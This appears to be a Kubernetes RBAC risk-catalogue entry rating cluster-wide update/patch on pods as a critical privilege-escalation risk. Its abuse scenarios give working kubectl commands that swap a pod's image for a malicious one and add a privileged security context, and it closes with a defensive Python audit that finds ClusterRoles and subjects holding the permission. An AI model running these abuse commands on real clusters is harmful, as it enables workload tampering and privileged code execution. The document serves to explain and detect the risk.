Update/Patch pods cluster-wide
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1008 |
| Name | Update/Patch pods cluster-wide |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | core |
| Resources | pods |
| Verbs | update, patch |
| Tags | PrivilegeEscalation, Tampering, WorkloadExecution |
Description
Permits modifying existing pods in any namespace across the cluster. This is critical as an attacker can alter a pod’s specification to grant it elevated privileges (e.g., change image, add privileged security context, mount sensitive host paths), leading to code execution, privilege escalation, and tampering with running workloads.
Abuse Scenarios
- Patch a running pod to change its container image to a malicious one.

  ```bash
  kubectl set image pod/<pod-name> <container-name>=<malicious-image> -n <namespace>
  # Example: kubectl set image pod/nginx-deployment-xyz nginx=malicious/nginx-backdoor -n default
  ```

- Patch a running pod to add a privileged security context (if not blocked by PSP/PSA).

  ```bash
  kubectl patch pod <pod-name> -n <namespace> --type='json' -p='[{"op": "add", "path": "/spec/containers/0/securityContext", "value": {"privileged": true}}]'
  # Example: kubectl patch pod my-app-pod -n production --type='json' -p='[{"op": "add", "path": "/spec/containers/0/securityContext", "value": {"privileged": true}}]'
  ```
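A defender-side audit for this entry, added here as an example and not part of the original catalogue: it reads the JSON that `kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json` produce, flags every ClusterRole granting `update` or `patch` on core-group `pods` (honouring `*` wildcards and ignoring subresources such as `pods/exec`), and reports which subjects receive it cluster-wide through a ClusterRoleBinding. The sample objects and names (`pod-patcher`, `god-mode`, `ci-runner`) are constructed for the example.

```python
import json
# Constructed samples in the shape of `kubectl get clusterroles/clusterrolebindings -o json`; names are made up.
SAMPLE_ROLES = json.loads("""{"items": [
 {"metadata": {"name": "pod-patcher"},
  "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "patch"]}]},
 {"metadata": {"name": "pod-reader"},
  "rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "list", "watch"]}]},
 {"metadata": {"name": "god-mode"},
  "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
 {"metadata": {"name": "deploy-patcher"},
  "rules": [{"apiGroups": ["apps"], "resources": ["deployments"], "verbs": ["patch"]}]}]}""")
SAMPLE_BINDINGS = json.loads("""{"items": [
 {"roleRef": {"kind": "ClusterRole", "name": "pod-patcher"},
  "subjects": [{"kind": "ServiceAccount", "name": "ci-runner", "namespace": "ci"}]},
 {"roleRef": {"kind": "ClusterRole", "name": "god-mode"},
  "subjects": [{"kind": "Group", "name": "system:masters"}]}]}""")
RISKY_VERBS = {"update", "patch"}

def _hits(rule_values, wanted):
    """Members of `wanted` that a PolicyRule field grants; a '*' entry grants them all."""
    values = set(rule_values or [])
    return set(wanted) if "*" in values else values & wanted

def risky_verbs_in_rule(rule):
    """update/patch verbs this rule grants on core-group 'pods' itself."""
    # Core group is spelled "" in RBAC rules; "pods/exec", "pods/log" etc. are distinct resources and do not match.
    if not _hits(rule.get("apiGroups"), {""}) or not _hits(rule.get("resources"), {"pods"}):
        return set()
    return _hits(rule.get("verbs"), RISKY_VERBS)

def find_risky_cluster_roles(roles):
    """ClusterRole name -> sorted risky verbs, for every role matching entry 1008."""
    found = {}
    for role in roles.get("items", []):
        verbs = set().union(*(risky_verbs_in_rule(r) for r in role.get("rules", [])))
        if verbs:
            found[role["metadata"]["name"]] = sorted(verbs)
    return found

def cluster_wide_subjects(bindings, risky_roles):
    """Risky ClusterRole -> subjects holding it via a ClusterRoleBinding (a role handed
    out only through namespaced RoleBindings is not cluster-wide and is skipped)."""
    out = {}
    for crb in bindings.get("items", []):
        ref = crb.get("roleRef", {})
        if ref.get("kind") == "ClusterRole" and ref.get("name") in risky_roles:
            out.setdefault(ref["name"], []).extend(
                f"{s['kind']}/{s['name']}" for s in crb.get("subjects", []))
    return out
```

Feed the two `kubectl ... -o json` outputs into `find_risky_cluster_roles` and `cluster_wide_subjects` to get the list of subjects that hold this entry's permission across the whole cluster.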